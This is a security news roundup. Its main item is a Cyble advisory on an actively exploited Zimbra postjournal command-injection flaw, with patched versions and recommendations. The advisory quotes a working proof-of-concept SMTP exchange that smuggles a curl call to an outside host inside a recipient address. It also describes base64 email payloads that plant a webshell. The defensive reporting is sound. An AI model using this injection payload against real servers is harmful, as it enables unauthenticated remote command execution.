Separating the bee from the panda: CeranaKeeper making a beeline for Thailand

ESET Research details the tools and activities of a new China-aligned threat actor, CeranaKeeper, focusing on massive data exfiltration in Southeast Asia

WeLiveSecurity – Read More

Zimbra Remote Code Execution Vulnerability Under Active Attack

Key Takeaways

A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.

A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.

The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.

Overview

A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.

The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.

Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.

Patched versions include these versions and newer:

9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46

One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.

Technical Analysis

Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.

The researchers reversed the postjournal binary and found no calls to execvp or the run_command function. Instead, the read_maps function calls popen directly, so input reaches it without sanitization. Wrapping the cmd argument passed to popen in double quotes blocks injection with simple shell metacharacters, but the shell still performs command substitution inside double quotes, so that control could be bypassed with $() syntax.

The postjournal service was then exploited via port 10027 with the following SMTP commands:

EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.

The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

zmlocalconfig -e postjournal_enabled=true
zmcontrol restart

For remote exploitation, the researchers found that the default mynetworks configuration included a /20 CIDR range containing their public IP address, so the exploit could be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.

Proofpoint researchers have observed the vulnerability under exploitation, with spoofed emails whose CC fields contain fake addresses crafted so that Zimbra servers parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.

Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and when concatenated, the base64 blobs decode to a command that writes a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).

Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
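As an added illustration of the popen-versus-execvp point in the analysis above (not code from the postjournal binary, from Zimbra's patch, or from the ProjectDiscovery write-up), the following C shows why double-quoting the popen argument does not stop $() substitution, a tighter-than-RFC allow-list check of the kind that would also reject the crafted CC addresses described above, and an execvp path that never invokes a shell. The lookup path and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Shape of the vulnerable pattern: a recipient local-part is pasted into a
 * command line destined for popen(). Double quotes stop ';' or '|' from
 * splitting the command, but $(...) and `...` still expand inside them.
 * This only builds the string; nothing is executed. The lookup path is a
 * made-up placeholder, not Zimbra's. */
int build_popen_cmd(char *out, size_t outlen, const char *local_part) {
    int n = snprintf(out, outlen, "/path/to/lookup \"%s\"", local_part);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Allow-list for a local-part: letters, digits and . _ + - only. Tighter
 * than RFC 5321 atext (which permits $ ` { } |), so every shell expansion
 * trigger is rejected before the value gets near a command. */
int is_safe_local_part(const char *s) {
    if (*s == '\0' || strlen(s) > 64) return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && !strchr("._+-", *s)) return 0;
    return 1;
}

/* Hardened path: no shell. The local-part is one argv element for
 * /bin/echo via execvp; the child's stdout is captured so the caller can
 * verify the bytes arrived untouched. Returns 0 if the child exited 0. */
int echo_via_execvp(const char *local_part, char *out, size_t outlen) {
    int fd[2], status = 0; size_t got = 0; ssize_t r;
    if (pipe(fd) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                              /* child */
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]); close(fd[1]);
        char *const argv[] = { "/bin/echo", (char *)local_part, NULL };
        execvp(argv[0], argv);
        _exit(127);                              /* exec failed */
    }
    close(fd[1]);                                /* parent */
    while (got + 1 < outlen &&
           (r = read(fd[0], out + got, outlen - got - 1)) > 0)
        got += (size_t)r;
    out[got] = '\0';
    close(fd[0]);
    waitpid(pid, &status, 0);
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

The captured output of echo_via_execvp is the PoC's local-part byte for byte, which is the point: with execvp the $() text is an argument, not something a shell evaluates.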

Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:

| CVE ID | Vendor/Project | Product | Vulnerability Name |
|---|---|---|---|
| CVE-2023-37580 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-27926 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-41352 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
| CVE-2022-27925 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
| CVE-2022-37042 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability |
| CVE-2022-27924 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Command Injection Vulnerability |
| CVE-2018-6882 | Zimbra | Collaboration Suite (ZCS) | Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-24682 | Zimbra | Webmail | Zimbra Webmail Cross-Site Scripting Vulnerability |

While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.

Recommendations

All Zimbra administrators should:

Disable postjournal if not needed
Configure mynetworks to prevent unauthorized access
Apply the latest security updates directly from Zimbra


Blog – Cyble – Read More

Ivanti Endpoint Manager Flaw Actively Targeted, CISA Warns Agencies to Patch

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting Endpoint Manager (EPM) that the company patched in May to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerability, tracked as CVE-2024-29824, carries a CVSS score of 9.6 out of a maximum of 10.0, indicating critical severity.
“An

The Hacker News – Read More

China-Backed APT Group Culling Thai Government Data

CeranaKeeper is bombarding Southeast Asia with data exfiltration attacks via file-sharing services such as Pastebin, OneDrive, and GitHub, researchers say.

darkreading – Read More

NSA Releases 6 Principles of OT Cybersecurity

Organizations can use this guide to make decisions for designing, implementing, and managing OT environments to ensure they are both safe and secure, as well as enable business continuity for critical services.

darkreading – Read More

4 Ways to Fight AI-Based Fraud

Generative AI is being used to make cyberscams more believable. Here’s how organizations can counter that using newly emerging tools and reliable methods.

darkreading – Read More

Experts warn of DDoS attacks using Linux printing vulnerability

A set of bugs that has caused alarm among cybersecurity experts may enable threat actors to launch powerful attacks designed to knock systems offline.

The Record from Recorded Future News – Read More

Unix Printing Vulnerabilities Enable Easy DDoS Attacks

All an attacker needs to exploit flaws in the Common Unix Printing System is a few seconds and less than 1 cent in computing costs.

darkreading – Read More

North Korea’s ‘Stonefly’ APT Swarms US Private Co’s. for Profit

Despite a $10 million bounty on one member, APT45 is not slowing down, pivoting from intelligence gathering to extorting funds for Kim Jong-Un’s regime.

darkreading – Read More

How to protect schools from cyberthreats | Kaspersky official blog

A very troubling trend in recent years has been the rising number of cyberattacks targeting educational institutions. The United States, for instance, has seen school education become one of the most targeted sectors. According to the UK’s Information Commissioner’s Office (ICO), the number of attacks on schools increased by 55% from 2022 to 2023. A similar pattern is emerging globally. Let’s unpick what’s going on here, and look at the ways schools can defend themselves.

Why cybercriminals love school

Several factors contribute to the growing vulnerability of schools, making them attractive targets for cybercriminals:

Dependence on technology. Educational institutions are rapidly becoming digital and are thus reliant on IT infrastructure both in the classroom and in schools’ administration offices. However, their cybersecurity practices are often sadly lacking.
Valuable data. Schools store a wealth of sensitive information, including student and staff data, and financial records. Data breaches can have devastating consequences, and this data is exactly what attackers are after.
Scarce resources. Schools often face tight budgets and a shortage of qualified IT professionals — especially in cybersecurity.
Low user awareness. A great many computer users in schools have little cybersecurity nous. This means they’re susceptible to phishing attacks, malware infections, and other cyberthreats. Often, teachers aren’t much more cyber-savvy.

This all turns educational institutions into sitting ducks. What’s more, successful attacks attract plenty of public attention, which gives cybercriminals leverage — particularly in ransom negotiations following a ransomware attack. The essential nature and social importance of educational institutions also play a significant role.

Sure, if a ransomware attack temporarily shuts a retail chain down, it’s unpleasant — but mostly just for the business itself; customers can generally go elsewhere quite easily. However, if a cyberattack disrupts a school, the consequences are far more serious. Students lose access to education, their academic performance suffers, and parents get landed with arranging childcare and other headaches.

Cyberattacks on educational institutions

Attacks on education are now so common that you don’t have to look far for examples of even large-scale incidents — just look at recent headlines. Not so long ago, a cyberattack targeted Highline Public Schools, a school district in Washington state in the US. The incident forced the district to temporarily close all 34 of its schools — affecting over 17,000 students. All educational activities, including athletics and meetings, were suspended.

In August of this year, the Singapore Ministry of Education announced that an unknown hacker had wiped clean 13,000 iPads and Chromebooks used by students across the country.

In June, the Toronto District School Board, which oversees nearly 600 schools in Canada’s largest city, was hit by a ransomware attack. In May, Western Sydney University, one of Australia’s largest universities with over 35,000 students, reported a hack on its IT infrastructure.

How to protect schools from cyberattacks

With the education sector firmly in the crosshairs of cybercriminals, schools’ IT systems need robust protection.

So how to get it? While large schools, colleges, and universities can allocate substantial budgets for enterprise-grade software and dedicated cybersecurity staff, smaller schools often lack these resources.

As a result, these schools sometimes resort to using security software intended for home use. However, this isn’t ideal. Such products aren’t designed for centralized management, so deploying them across numerous school computers, let alone managing them effectively, can become a major headache.

A far better solution for small schools would be a product designed for small and medium businesses (SMB), such as Kaspersky Small Office Security. Such security software offers all the essential features needed for basic security:

Reliable protection against ransomware and other malware
Automatic backups
Password manager to protect accounts
Vulnerability scanning and much more

Furthermore, SMB security solutions are easy to deploy and can operate on an “install and forget” basis — no dedicated IT or security specialist is required for setup and management.

To strengthen school cybersecurity further, we also recommend conducting staff training to raise awareness of cyberthreats. This is easy to set up with our Kaspersky Automated Security Awareness Platform, which helps slash both the time and cost of training.

Kaspersky official blog – Read More